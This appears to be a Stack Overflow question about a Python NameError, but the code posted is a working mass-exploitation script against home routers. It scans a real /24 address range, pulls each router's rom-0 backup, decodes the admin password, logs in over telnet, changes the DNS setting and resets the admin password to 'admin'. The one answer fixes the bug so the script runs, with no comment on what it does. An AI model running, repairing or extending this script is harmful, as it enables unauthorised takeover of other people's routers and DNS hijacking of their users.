# Python error NameError:

Tags: python

I'm new to python programming. I'm trying a simple code, but when I run the code it shows an error like this:

```
root@bt:~# python code.py
Traceback (most recent call last):
  File "code.py", line 42, in <module>
    print host+" -> Offline!"
NameError: name 'host' is not defined
```

I don't know how to solve this. This is my code:

attack.py

```
from netaddr import IPNetwork
import os
for ip in IPNetwork ('41.108.48.1/24'):
    os.system("python code.py "+str(ip))
```

code.py

```
from poster.encode import multipart_encode
from poster.streaminghttp import register_openers
from netaddr import IPNetwork
import urllib2
import urllib
import re
import getpass
import sys
import telnetlib
import time
import os
import socket
import sys
socket.setdefaulttimeout(4)

register_openers()

try:
    os.remove("rom-0")
except:
    pass
try:
    host=str(sys.argv[1])
    urllib.urlretrieve ("http://"+host+"/rom-0", "rom-0")

    datagen, headers = multipart_encode({"uploadedfile": open("rom-0")})

    request = urllib2.Request("http://localhost/decoded.php", datagen, headers)

    str1 = urllib2.urlopen(request).read()
    m = re.search('rows=10>(.*)', str1)
    if m:
        found = m.group(1)   
    tn = telnetlib.Telnet(host, 23, 3)         
    tn.read_until("Password: ") 
    tn.write(found + "\n") 
    tn.write("set lan dhcpdns 8.8.8.8\n")
    tn.write("sys password admin\n")
    print host+" -> Success" 
    tn.write("exit\n")
except:
    print host+" -> Offline!"
```

Comment: You posted this an hour ago. There are great answers there. Read them!

Comment: You might find my answer to [this question](http://stackoverflow.com/q/21330438/3001761) relevant to your situation.

Answer (score 0):

It looks like you are going straight into your last `except` block before the variable `host` is declared. Declare `host` before the `try/except` and you should find the source of your actual error. I'm guessing the error is because you are not passing an argument to your script:

`python code.py some_argument`

```
host="Error!" # declare host here 
try:
    host=str(sys.argv[1]) 
    urllib.urlretrieve ("http://"+host+"/rom-0", "rom-0")
```